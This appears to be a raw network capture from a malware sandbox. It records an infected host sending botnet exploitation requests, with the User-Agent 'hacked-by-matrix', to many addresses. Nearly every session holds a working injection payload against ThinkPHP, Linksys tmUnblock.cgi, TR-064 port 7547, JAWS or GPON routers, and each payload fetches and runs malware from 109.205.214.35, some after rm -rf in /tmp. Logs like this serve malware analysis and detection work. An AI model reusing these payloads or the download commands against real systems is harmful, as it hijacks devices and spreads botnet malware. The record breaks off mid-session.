                                                        Data Ascii: <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"><HTML><HEAD><META HTTP-EQUIV="Content-Type" CONTENT="text/html; charset=iso-8859-1"><TITLE>ERROR: The request could not be satisfied</TITLE


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        618192.168.2.133373895.142.174.8680
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:22:42.858946085 CET325OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]= 'wget http://109.205.214.35/x86 -O /tmp/.matrix; chmod 777 /tmp/.matrix; /tmp/.matrix thinkphp' HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: /
                                                        User-Agent: hacked-by-matrix
                                                        Mar 21, 2024 05:22:43.018650055 CET283INHTTP/1.1 301 Moved Permanently
                                                        Date: Thu, 21 Mar 2024 04:22:42 GMT
                                                        Server: AWS (Ada Web Server) v2018
                                                        Location: https://:443/index.php
                                                        Connection: keep-alive
                                                        Content-Type: text/html
                                                        Content-Length: 61
                                                        Data Raw: 50 61 67 65 20 6d 6f 76 65 64 3c 62 72 3e 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 3a 34 34 33 2f 69 6e 64 65 78 2e 70 68 70 22 3e 43 6c 69 63 6b 20 68 65 72 65 3c 2f 61 3e
                                                        Data Ascii: Page moved<br><a href="https://:443/index.php">Click here</a>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        619192.168.2.135318495.179.189.7080
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:22:42.868443012 CET325OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]= 'wget http://109.205.214.35/x86 -O /tmp/.matrix; chmod 777 /tmp/.matrix; /tmp/.matrix thinkphp' HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: /
                                                        User-Agent: hacked-by-matrix


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        620192.168.2.134328895.163.12.25180
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:22:42.908684969 CET325OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]= 'wget http://109.205.214.35/x86 -O /tmp/.matrix; chmod 777 /tmp/.matrix; /tmp/.matrix thinkphp' HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: /
                                                        User-Agent: hacked-by-matrix
                                                        Mar 21, 2024 05:22:43.122627974 CET307INHTTP/1.1 400 Bad Request
                                                        Server: nginx
                                                        Date: Thu, 21 Mar 2024 04:22:42 GMT
                                                        Content-Type: text/html
                                                        Content-Length: 150
                                                        Connection: close
                                                        Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                        Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>nginx</center></body></html>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        621192.168.2.134239895.183.39.11980
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:22:42.934667110 CET325OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]= 'wget http://109.205.214.35/x86 -O /tmp/.matrix; chmod 777 /tmp/.matrix; /tmp/.matrix thinkphp' HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: /
                                                        User-Agent: hacked-by-matrix
                                                        Mar 21, 2024 05:22:43.183852911 CET315INHTTP/1.1 400 Bad Request
                                                        Server: openresty
                                                        Date: Thu, 21 Mar 2024 04:22:43 GMT
                                                        Content-Type: text/html
                                                        Content-Length: 154
                                                        Connection: close
                                                        Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                        Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>openresty</center></body></html>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        622192.168.2.134502888.221.62.8980
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:22:43.027816057 CET325OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]= 'wget http://109.205.214.35/x86 -O /tmp/.matrix; chmod 777 /tmp/.matrix; /tmp/.matrix thinkphp' HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: /
                                                        User-Agent: hacked-by-matrix
                                                        Mar 21, 2024 05:22:43.196194887 CET479INHTTP/1.0 400 Bad Request
                                                        Server: AkamaiGHost
                                                        Mime-Version: 1.0
                                                        Content-Type: text/html
                                                        Content-Length: 257
                                                        Expires: Thu, 21 Mar 2024 04:22:43 GMT
                                                        Date: Thu, 21 Mar 2024 04:22:43 GMT
                                                        Connection: close
                                                        Data Raw: 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 0a 3c 54 49 54 4c 45 3e 49 6e 76 61 6c 69 64 20 55 52 4c 3c 2f 54 49 54 4c 45 3e 0a 3c 2f 48 45 41 44 3e 3c 42 4f 44 59 3e 0a 3c 48 31 3e 49 6e 76 61 6c 69 64 20 55 52 4c 3c 2f 48 31 3e 0a 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 22 68 74 74 70 26 23 35 38 3b 26 23 34 37 3b 26 23 34 37 3b 26 23 33 37 3b 35 62 4e 6f 26 23 33 37 3b 32 30 48 6f 73 74 26 23 33 37 3b 35 64 26 23 34 37 3b 69 6e 64 65 78 26 23 34 36 3b 70 68 70 26 23 36 33 3b 22 2c 20 69 73 20 69 6e 76 61 6c 69 64 2e 3c 70 3e 0a 52 65 66 65 72 65 6e 63 65 26 23 33 32 3b 26 23 33 35 3b 39 26 23 34 36 3b 39 66 38 66 31 34 30 32 26 23 34 36 3b 31 37 31 30 39 39 34 39 36 33 26 23 34 36 3b 62 31 64 65 62 63 34 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0a
                                                        Data Ascii: <HTML><HEAD><TITLE>Invalid URL</TITLE></HEAD><BODY><H1>Invalid URL</H1>The requested URL "http&#58;&#47;&#47;&#37;5bNo&#37;20Host&#37;5d&#47;index&#46;php&#63;", is invalid.<p>Reference&#32;&#35;9&#46;9f8f1402&#46;1710994963&#46;b1debc4</BODY></HTML>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        623192.168.2.135848088.116.105.14980
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:22:43.081877947 CET325OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]= 'wget http://109.205.214.35/x86 -O /tmp/.matrix; chmod 777 /tmp/.matrix; /tmp/.matrix thinkphp' HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: /
                                                        User-Agent: hacked-by-matrix
                                                        Mar 21, 2024 05:22:44.268291950 CET325OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]= 'wget http://109.205.214.35/x86 -O /tmp/.matrix; chmod 777 /tmp/.matrix; /tmp/.matrix thinkphp' HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: /
                                                        User-Agent: hacked-by-matrix
                                                        Mar 21, 2024 05:22:44.485877037 CET322INHTTP/1.1 400 Bad Request
                                                        Server: nginx
                                                        Date: Thu, 21 Mar 2024 04:22:44 GMT
                                                        Content-Type: text/html; charset=utf-8
                                                        Content-Length: 150
                                                        Connection: close
                                                        Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                        Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>nginx</center></body></html>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        624192.168.2.1343512172.64.41.538080
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:22:43.082124949 CET122OUTPOST /tmUnblock.cgi cd /tmp; rm -rf mpsl; wget http://109.205.214.35/mpsl;chmod 777 *;./mpsl asus;sh mpsl asu
                                                        Data Raw:
                                                        Data Ascii:


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        625192.168.2.1355074172.67.78.2098080
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:22:43.082884073 CET122OUTPOST /tmUnblock.cgi cd /tmp; rm -rf mpsl; wget http://109.205.214.35/mpsl;chmod 777 *;./mpsl asus;sh mpsl asu
                                                        Data Raw:
                                                        Data Ascii:


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        626192.168.2.1352250184.186.101.228080
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:22:43.158423901 CET122OUTPOST /tmUnblock.cgi cd /tmp; rm -rf mpsl; wget http://109.205.214.35/mpsl;chmod 777 *;./mpsl asus;sh mpsl asu
                                                        Data Raw:
                                                        Data Ascii:
                                                        Mar 21, 2024 05:22:44.076317072 CET122OUTPOST /tmUnblock.cgi cd /tmp; rm -rf mpsl; wget http://109.205.214.35/mpsl;chmod 777 *;./mpsl asus;sh mpsl asu
                                                        Data Raw:
                                                        Data Ascii:


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        627192.168.2.1359554137.25.129.1857547
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:22:43.184353113 CET722OUTPOST /UD/act?1 HTTP/1.1
                                                        Host: 127.0.0.1:7547
                                                        User-Agent: hacked-by-matrix
                                                        SOAPAction: urn:dslforum-org:service:Time:1#SetNTPServers
                                                        Content-Type: text/xml
                                                        Content-Length: 526
                                                        <?xml version="1.0"?><SOAP-ENV:Envelope xmlns:SOAP-ENV="http://schemas.xmlsoap.org/soap/envelope/" SOAP-ENV:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"> <SOAP-ENV:Body> <u:SetNTPServers xmlns:u="urn:dslforum-org:service:Time:1"> <NewNTPServer1>`cd /tmp;wget http://109.205.214.35/mips; chmod 777 mips; ./mips tr064`</NewNTPServer1> <NewNTPServer2></NewNTPServer2> <NewNTPServer3></NewNTPServer3> <NewNTPServer4></NewNTPServer4> <NewNTPServer5></NewNTPServer5> </u:SetNTPServers> </SOAP-ENV:Body></SOAP-ENV:Envelope
                                                        Data Raw:
                                                        Data Ascii:
                                                        Mar 21, 2024 05:22:47.212261915 CET722OUTPOST /UD/act?1 HTTP/1.1
                                                        Host: 127.0.0.1:7547
                                                        User-Agent: hacked-by-matrix
                                                        SOAPAction: urn:dslforum-org:service:Time:1#SetNTPServers
                                                        Content-Type: text/xml
                                                        Content-Length: 526
                                                        <?xml version="1.0"?><SOAP-ENV:Envelope xmlns:SOAP-ENV="http://schemas.xmlsoap.org/soap/envelope/" SOAP-ENV:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"> <SOAP-ENV:Body> <u:SetNTPServers xmlns:u="urn:dslforum-org:service:Time:1"> <NewNTPServer1>`cd /tmp;wget http://109.205.214.35/mips; chmod 777 mips; ./mips tr064`</NewNTPServer1> <NewNTPServer2></NewNTPServer2> <NewNTPServer3></NewNTPServer3> <NewNTPServer4></NewNTPServer4> <NewNTPServer5></NewNTPServer5> </u:SetNTPServers> </SOAP-ENV:Body></SOAP-ENV:Envelope
                                                        Data Raw:
                                                        Data Ascii:
                                                        Mar 21, 2024 05:22:53.359301090 CET722OUTPOST /UD/act?1 HTTP/1.1
                                                        Host: 127.0.0.1:7547
                                                        User-Agent: hacked-by-matrix
                                                        SOAPAction: urn:dslforum-org:service:Time:1#SetNTPServers
                                                        Content-Type: text/xml
                                                        Content-Length: 526
                                                        <?xml version="1.0"?><SOAP-ENV:Envelope xmlns:SOAP-ENV="http://schemas.xmlsoap.org/soap/envelope/" SOAP-ENV:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"> <SOAP-ENV:Body> <u:SetNTPServers xmlns:u="urn:dslforum-org:service:Time:1"> <NewNTPServer1>`cd /tmp;wget http://109.205.214.35/mips; chmod 777 mips; ./mips tr064`</NewNTPServer1> <NewNTPServer2></NewNTPServer2> <NewNTPServer3></NewNTPServer3> <NewNTPServer4></NewNTPServer4> <NewNTPServer5></NewNTPServer5> </u:SetNTPServers> </SOAP-ENV:Body></SOAP-ENV:Envelope
                                                        Data Raw:
                                                        Data Ascii:
                                                        Mar 21, 2024 05:23:05.391016960 CET722OUTPOST /UD/act?1 HTTP/1.1
                                                        Host: 127.0.0.1:7547
                                                        User-Agent: hacked-by-matrix
                                                        SOAPAction: urn:dslforum-org:service:Time:1#SetNTPServers
                                                        Content-Type: text/xml
                                                        Content-Length: 526
                                                        <?xml version="1.0"?><SOAP-ENV:Envelope xmlns:SOAP-ENV="http://schemas.xmlsoap.org/soap/envelope/" SOAP-ENV:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"> <SOAP-ENV:Body> <u:SetNTPServers xmlns:u="urn:dslforum-org:service:Time:1"> <NewNTPServer1>`cd /tmp;wget http://109.205.214.35/mips; chmod 777 mips; ./mips tr064`</NewNTPServer1> <NewNTPServer2></NewNTPServer2> <NewNTPServer3></NewNTPServer3> <NewNTPServer4></NewNTPServer4> <NewNTPServer5></NewNTPServer5> </u:SetNTPServers> </SOAP-ENV:Body></SOAP-ENV:Envelope
                                                        Data Raw:
                                                        Data Ascii:


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        628192.168.2.135959623.58.250.4180
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:22:43.811877012 CET271OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 109.205.214.35/arm;chmod+777+/tmp/arm;sh+/tmp/arm4 jawsHTTP/1.1
                                                        User-Agent: hacked-by-matrix
                                                        Host: 127.0.0.1:80
                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                        Connection: keep-alive
                                                        Mar 21, 2024 05:22:43.939374924 CET437INHTTP/1.0 400 Bad Request
                                                        Server: AkamaiGHost
                                                        Mime-Version: 1.0
                                                        Content-Type: text/html
                                                        Content-Length: 215
                                                        Expires: Thu, 21 Mar 2024 04:22:43 GMT
                                                        Date: Thu, 21 Mar 2024 04:22:43 GMT
                                                        Connection: close
                                                        Data Raw: 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 0a 3c 54 49 54 4c 45 3e 42 61 64 20 52 65 71 75 65 73 74 3c 2f 54 49 54 4c 45 3e 0a 3c 2f 48 45 41 44 3e 3c 42 4f 44 59 3e 0a 3c 48 31 3e 42 61 64 20 52 65 71 75 65 73 74 3c 2f 48 31 3e 0a 59 6f 75 72 20 62 72 6f 77 73 65 72 20 73 65 6e 74 20 61 20 72 65 71 75 65 73 74 20 74 68 61 74 20 74 68 69 73 20 73 65 72 76 65 72 20 63 6f 75 6c 64 20 6e 6f 74 20 75 6e 64 65 72 73 74 61 6e 64 2e 3c 50 3e 0a 52 65 66 65 72 65 6e 63 65 26 23 33 32 3b 26 23 33 35 3b 37 26 23 34 36 3b 34 66 63 33 31 31 37 26 23 34 36 3b 31 37 31 30 39 39 34 39 36 33 26 23 34 36 3b 30 0a 3c 2f 42 4f 44 59 3e 0a 3c 2f 48 54 4d 4c 3e 0a
                                                        Data Ascii: <HTML><HEAD><TITLE>Bad Request</TITLE></HEAD><BODY><H1>Bad Request</H1>Your browser sent a request that this server could not understand.<P>Reference&#32;&#35;7&#46;4fc3117&#46;1710994963&#46;0</BODY></HTML>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        629192.168.2.1336084213.139.78.118080
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:22:44.310024977 CET442OUTPOST /tmUnblock.cgi HTTP/1.1
                                                        Host: 127.0.0.1:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: /
                                                        User-Agent: hacked-by-matrix
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 74 74 63 70 5f 69 70 3d 2d 68 2b 25 36 30 63 64 2b 25 32 46 74 6d 70 25 33 42 2b 72 6d 2b 2d 72 66 2b 41 6d 61 6b 61 6e 6f 2e 6d 70 73 6c 25 33 42 2b 77 67 65 74 2b 68 74 74 70 25 33 41 25 32 46 25 32 46 31 30 39 2e 32 30 35 2e 32 31 34 2e 33 35 25 32 46 6d 70 73 6c 25 33 42 2b 63 68 6d 6f 64 2b 37 37 37 2b 6d 70 73 6c 25 33 42 2b 2e 25 32 46 6d 70 73 6c 2b 6c 69 6e 6b 73 79 73 25 36 30 26 61 63 74 69 6f 6e 3d 26 74 74 63 70 5f 6e 75 6d 3d 32 26 74 74 63 70 5f 73 69 7a 65 3d 32 26 73 75 62 6d 69 74 5f 62 75 74 74 6f 6e 3d 26 63 68 61 6e 67 65 5f 61 63 74 69 6f 6e 3d 26 63 6f 6d 6d 69 74 3d 30 26 53 74 61 72 74 45 50 49 3d 31
                                                        Data Ascii: ttcp_ip=-h+%60cd+%2Ftmp%3B+rm+-rf+Amakano.mpsl%3B+wget+http%3A%2F%2F109.205.214.35%2Fmpsl%3B+chmod+777+mpsl%3B+.%2Fmpsl+linksys%60&action=&ttcp_num=2&ttcp_size=2&submit_button=&change_action=&commit=0&StartEPI=1


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        630192.168.2.135352099.250.27.1547547
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:22:44.329940081 CET734OUTPOST /UD/act?1 HTTP/1.1
                                                        Host: 127.0.0.1:7547
                                                        User-Agent: hacked-by-matrix
                                                        SOAPAction: urn:dslforum-org:service:Time:1#SetNTPServers
                                                        Content-Type: text/xml
                                                        Content-Length: 526
                                                        <?xml version="1.0"?><SOAP-ENV:Envelope xmlns:SOAP-ENV="http://schemas.xmlsoap.org/soap/envelope/" SOAP-ENV:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"> <SOAP-ENV:Body> <u:SetNTPServers xmlns:u="urn:dslforum-org:service:Time:1"> <NewNTPServer1>`cd /tmp;wget http://109.205.214.35/mips; chmod 777 mips; ./mips tr064`</NewNTPServer1> <NewNTPServer2></NewNTPServer2> <NewNTPServer3></NewNTPServer3> <NewNTPServer4></NewNTPServer4> <NewNTPServer5></NewNTPServer5> </u:SetNTPServers> </SOAP-ENV:Body></SOAP-ENV:Envelope
                                                        Data Raw:
                                                        Data Ascii:


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        631192.168.2.1359606137.25.129.1857547
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:22:44.389220953 CET722OUTPOST /UD/act?1 HTTP/1.1
                                                        Host: 127.0.0.1:7547
                                                        User-Agent: hacked-by-matrix
                                                        SOAPAction: urn:dslforum-org:service:Time:1#SetNTPServers
                                                        Content-Type: text/xml
                                                        Content-Length: 526
                                                        <?xml version="1.0"?><SOAP-ENV:Envelope xmlns:SOAP-ENV="http://schemas.xmlsoap.org/soap/envelope/" SOAP-ENV:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"> <SOAP-ENV:Body> <u:SetNTPServers xmlns:u="urn:dslforum-org:service:Time:1"> <NewNTPServer1>`cd /tmp;wget http://109.205.214.35/mips; chmod 777 mips; ./mips tr064`</NewNTPServer1> <NewNTPServer2></NewNTPServer2> <NewNTPServer3></NewNTPServer3> <NewNTPServer4></NewNTPServer4> <NewNTPServer5></NewNTPServer5> </u:SetNTPServers> </SOAP-ENV:Body></SOAP-ENV:Envelope
                                                        Data Raw:
                                                        Data Ascii:
                                                        Mar 21, 2024 05:22:48.495341063 CET722OUTPOST /UD/act?1 HTTP/1.1
                                                        Host: 127.0.0.1:7547
                                                        User-Agent: hacked-by-matrix
                                                        SOAPAction: urn:dslforum-org:service:Time:1#SetNTPServers
                                                        Content-Type: text/xml
                                                        Content-Length: 526
                                                        <?xml version="1.0"?><SOAP-ENV:Envelope xmlns:SOAP-ENV="http://schemas.xmlsoap.org/soap/envelope/" SOAP-ENV:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"> <SOAP-ENV:Body> <u:SetNTPServers xmlns:u="urn:dslforum-org:service:Time:1"> <NewNTPServer1>`cd /tmp;wget http://109.205.214.35/mips; chmod 777 mips; ./mips tr064`</NewNTPServer1> <NewNTPServer2></NewNTPServer2> <NewNTPServer3></NewNTPServer3> <NewNTPServer4></NewNTPServer4> <NewNTPServer5></NewNTPServer5> </u:SetNTPServers> </SOAP-ENV:Body></SOAP-ENV:Envelope
                                                        Data Raw:
                                                        Data Ascii:


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        632192.168.2.135354299.250.27.1547547
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:22:44.485960007 CET734OUTPOST /UD/act?1 HTTP/1.1
                                                        Host: 127.0.0.1:7547
                                                        User-Agent: hacked-by-matrix
                                                        SOAPAction: urn:dslforum-org:service:Time:1#SetNTPServers
                                                        Content-Type: text/xml
                                                        Content-Length: 526
                                                        <?xml version="1.0"?><SOAP-ENV:Envelope xmlns:SOAP-ENV="http://schemas.xmlsoap.org/soap/envelope/" SOAP-ENV:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"> <SOAP-ENV:Body> <u:SetNTPServers xmlns:u="urn:dslforum-org:service:Time:1"> <NewNTPServer1>`cd /tmp;wget http://109.205.214.35/mips; chmod 777 mips; ./mips tr064`</NewNTPServer1> <NewNTPServer2></NewNTPServer2> <NewNTPServer3></NewNTPServer3> <NewNTPServer4></NewNTPServer4> <NewNTPServer5></NewNTPServer5> </u:SetNTPServers> </SOAP-ENV:Body></SOAP-ENV:Envelope
                                                        Data Raw:
                                                        Data Ascii:
                                                        Mar 21, 2024 05:22:45.292293072 CET734OUTPOST /UD/act?1 HTTP/1.1
                                                        Host: 127.0.0.1:7547
                                                        User-Agent: hacked-by-matrix
                                                        SOAPAction: urn:dslforum-org:service:Time:1#SetNTPServers
                                                        Content-Type: text/xml
                                                        Content-Length: 526
                                                        <?xml version="1.0"?><SOAP-ENV:Envelope xmlns:SOAP-ENV="http://schemas.xmlsoap.org/soap/envelope/" SOAP-ENV:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"> <SOAP-ENV:Body> <u:SetNTPServers xmlns:u="urn:dslforum-org:service:Time:1"> <NewNTPServer1>`cd /tmp;wget http://109.205.214.35/mips; chmod 777 mips; ./mips tr064`</NewNTPServer1> <NewNTPServer2></NewNTPServer2> <NewNTPServer3></NewNTPServer3> <NewNTPServer4></NewNTPServer4> <NewNTPServer5></NewNTPServer5> </u:SetNTPServers> </SOAP-ENV:Body></SOAP-ENV:Envelope
                                                        Data Raw:
                                                        Data Ascii:
                                                        Mar 21, 2024 05:22:46.253591061 CET734OUTPOST /UD/act?1 HTTP/1.1
                                                        Host: 127.0.0.1:7547
                                                        User-Agent: hacked-by-matrix
                                                        SOAPAction: urn:dslforum-org:service:Time:1#SetNTPServers
                                                        Content-Type: text/xml
                                                        Content-Length: 526
                                                        <?xml version="1.0"?><SOAP-ENV:Envelope xmlns:SOAP-ENV="http://schemas.xmlsoap.org/soap/envelope/" SOAP-ENV:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"> <SOAP-ENV:Body> <u:SetNTPServers xmlns:u="urn:dslforum-org:service:Time:1"> <NewNTPServer1>`cd /tmp;wget http://109.205.214.35/mips; chmod 777 mips; ./mips tr064`</NewNTPServer1> <NewNTPServer2></NewNTPServer2> <NewNTPServer3></NewNTPServer3> <NewNTPServer4></NewNTPServer4> <NewNTPServer5></NewNTPServer5> </u:SetNTPServers> </SOAP-ENV:Body></SOAP-ENV:Envelope
                                                        Data Raw:
                                                        Data Ascii:


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        633192.168.2.1349440118.76.198.43443
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:22:44.610090971 CET324OUTPOST /GponForm/diag_Form?style/ HTTP/1.1
                                                        User-Agent: hacked-by-matrix
                                                        Accept: */*
                                                        Accept-Encoding: gzip, deflate
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 58 57 65 62 50 61 67 65 4e 61 6d 65 3d 64 69 61 67 26 64 69 61 67 5f 61 63 74 69 6f 6e 3d 70 69 6e 67 26 77 61 6e 5f 63 6f 6e 6c 69 73 74 3d 30 26 64 65 73 74 5f 68 6f 73 74 3d 60 62 75 73 79 62 6f 78 2b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 31 30 39 2e 32 30 35 2e 32 31 34 2e 33 35 2f 6d 61 74 72 69 78 65 78 70 2e 73 68 2b 2d 4f 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 3b 73 68 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 60 26 69 70 76 3d 30
                                                        Data Ascii: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`busybox+wget+http://109.205.214.35/matrixexp.sh+-O+/tmp/matrix;sh+/tmp/matrix`&ipv=0


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        634192.168.2.1343284109.9.38.39443
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:22:44.610110044 CET324OUTPOST /GponForm/diag_Form?style/ HTTP/1.1
                                                        User-Agent: hacked-by-matrix
                                                        Accept: */*
                                                        Accept-Encoding: gzip, deflate
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 58 57 65 62 50 61 67 65 4e 61 6d 65 3d 64 69 61 67 26 64 69 61 67 5f 61 63 74 69 6f 6e 3d 70 69 6e 67 26 77 61 6e 5f 63 6f 6e 6c 69 73 74 3d 30 26 64 65 73 74 5f 68 6f 73 74 3d 60 62 75 73 79 62 6f 78 2b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 31 30 39 2e 32 30 35 2e 32 31 34 2e 33 35 2f 6d 61 74 72 69 78 65 78 70 2e 73 68 2b 2d 4f 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 3b 73 68 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 60 26 69 70 76 3d 30
                                                        Data Ascii: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`busybox+wget+http://109.205.214.35/matrixexp.sh+-O+/tmp/matrix;sh+/tmp/matrix`&ipv=0


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        635192.168.2.13480765.203.22.118443
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:22:44.610136986 CET324OUTPOST /GponForm/diag_Form?style/ HTTP/1.1
                                                        User-Agent: hacked-by-matrix
                                                        Accept: */*
                                                        Accept-Encoding: gzip, deflate
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 58 57 65 62 50 61 67 65 4e 61 6d 65 3d 64 69 61 67 26 64 69 61 67 5f 61 63 74 69 6f 6e 3d 70 69 6e 67 26 77 61 6e 5f 63 6f 6e 6c 69 73 74 3d 30 26 64 65 73 74 5f 68 6f 73 74 3d 60 62 75 73 79 62 6f 78 2b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 31 30 39 2e 32 30 35 2e 32 31 34 2e 33 35 2f 6d 61 74 72 69 78 65 78 70 2e 73 68 2b 2d 4f 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 3b 73 68 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 60 26 69 70 76 3d 30
